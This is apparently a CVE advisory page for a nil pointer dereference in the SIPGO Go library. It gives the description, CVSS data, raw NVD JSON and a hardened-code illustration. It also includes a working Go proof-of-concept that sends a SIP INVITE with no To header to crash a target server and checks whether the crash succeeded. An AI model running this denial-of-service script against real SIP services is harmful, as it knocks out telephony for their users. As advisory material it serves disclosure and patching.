Security Vulnerability Report
CVE-2025-68274 CVSS 7.5 HIGH

CVE-2025-68274

Published: 2025-12-16 22:15:51
Last Modified: 2026-03-05 19:52:10

Description

SIPGO is a library for writing SIP services in the Go language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, the library's `NewResponseFromRequest` function contains a nil pointer dereference vulnerability that affects all normal SIP operations. It allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs because SIP message parsing succeeds for a request missing the To header, while the response creation code assumes the To header exists and performs no nil check. This affects routine operations such as call setup, authentication, and message handling, not just error cases. Every SIP application that uses the sipgo library is affected, regardless of configuration or edge case, as long as it calls `NewResponseFromRequest`. Version 1.0.0-alpha-1 contains a patch for the issue.
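The failure mode the description names, reduced to a self-contained Go illustration added here (this is not sipgo's code; the `Request` type and the `parseRequest`, `vulnerableResponse` and `hardenedResponse` functions are constructed for the example). A permissive header parse leaves a missing To as nil, the response builder that mirrors the pre-patch pattern dereferences it and panics, and the checked variant returns an error the server can answer with a 400 Bad Request instead of dying.

```go
package main

import (
	"fmt"
	"strings"
)

// Request holds the headers a SIP response echoes back. Constructed for this
// example, not sipgo's type: a header the request lacks stays nil, mirroring
// the permissive parse the advisory describes.
type Request struct {
	Via, From, To, CallID, CSeq *string
}

// parseRequest fills Request from a raw SIP message; unknown headers are ignored.
func parseRequest(raw string) *Request {
	req := &Request{}
	slots := map[string]**string{"via": &req.Via, "from": &req.From, "to": &req.To, "call-id": &req.CallID, "cseq": &req.CSeq}
	for _, line := range strings.Split(raw, "\r\n")[1:] {
		name, val, ok := strings.Cut(line, ":")
		if !ok {
			break // blank line ends the header section
		}
		if slot, known := slots[strings.ToLower(name)]; known {
			v := strings.TrimSpace(val)
			*slot = &v
		}
	}
	return req
}

// vulnerableResponse follows the pattern the CVE describes: it dereferences
// req.To with no check, so a request lacking To panics with a nil dereference.
func vulnerableResponse(req *Request, code int) string {
	return fmt.Sprintf("SIP/2.0 %d\r\nVia: %s\r\nFrom: %s\r\nTo: %s\r\nCall-ID: %s\r\nCSeq: %s\r\n\r\n",
		code, *req.Via, *req.From, *req.To, *req.CallID, *req.CSeq)
}

// hardenedResponse checks the mandatory headers first; the caller can answer
// 400 Bad Request or drop the message instead of crashing the whole service.
func hardenedResponse(req *Request, code int) (string, error) {
	present := map[string]*string{"Via": req.Via, "From": req.From, "To": req.To, "Call-ID": req.CallID, "CSeq": req.CSeq}
	for _, name := range []string{"Via", "From", "To", "Call-ID", "CSeq"} {
		if present[name] == nil {
			return "", fmt.Errorf("missing mandatory header %s", name)
		}
	}
	return vulnerableResponse(req, code), nil
}
```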

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:emiago:sipgo:*:*:*:*:*:go:*:* - VULNERABLE
SIPGO >= 0.3.0 and < 1.0.0-alpha-1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```go
package main

import (
	"net"
	"strings"
	"time"
)

// PoC for CVE-2025-68274: SIPGO nil pointer dereference
// Send a malformed SIP INVITE request without To header
func main() {
	// Target SIP server address
	target := "127.0.0.1:5060"

	// Malformed SIP INVITE request without To header
	// This triggers nil pointer dereference in NewResponseFromRequest
	malformedINVITE := "INVITE sip:[email protected] SIP/2.0\r\n" +
		"Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776sgk2\r\n" +
		"Max-Forwards: 70\r\n" +
		// Missing To header - this is the key trigger
		"From: <sip:[email protected]>;tag=12345\r\n" +
		"Call-ID: [email protected]\r\n" +
		"CSeq: 1 INVITE\r\n" +
		"Contact: <sip:[email protected]:5060>\r\n" +
		"Content-Type: application/sdp\r\n" +
		"Content-Length: 0\r\n" +
		"\r\n"

	// Connect and send malformed request
	conn, err := net.DialTimeout("udp", target, 5*time.Second)
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Send the malicious SIP message
	_, err = conn.Write([]byte(malformedINVITE))
	if err != nil {
		panic(err)
	}

	// Keep connection alive to observe crash
	time.Sleep(2 * time.Second)

	// Try to verify server is down
	_, err = conn.Write([]byte(strings.Replace(malformedINVITE, "INVITE", "OPTIONS", 1)))
	if err != nil {
		println("Target appears to be crashed (DoS successful)")
	}
}

/*
Vulnerability Analysis:
1. The malformed SIP INVITE lacks the To header field
2. SIPGO's NewResponseFromRequest assumes To header exists
3. Without nil check, accessing To header causes crash
4. This affects all SIP operations using the vulnerable function

Mitigation: Upgrade to SIPGO version 1.0.0-alpha-1 or later
*/
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-68274",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T22:15:50.830",
    "lastModified": "2026-03-05T19:52:09.983",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue."}
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"},
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-755"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emiago:sipgo:*:*:*:*:*:go:*:*", "versionStartIncluding": "0.30.0", "versionEndExcluding": "1.0.0", "matchCriteriaId": "2A3CF6C1-221C-4B0A-AC28-C829F371C968"}]}]}
    ],
    "references": [
      {"url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}
    ]
  }
}
```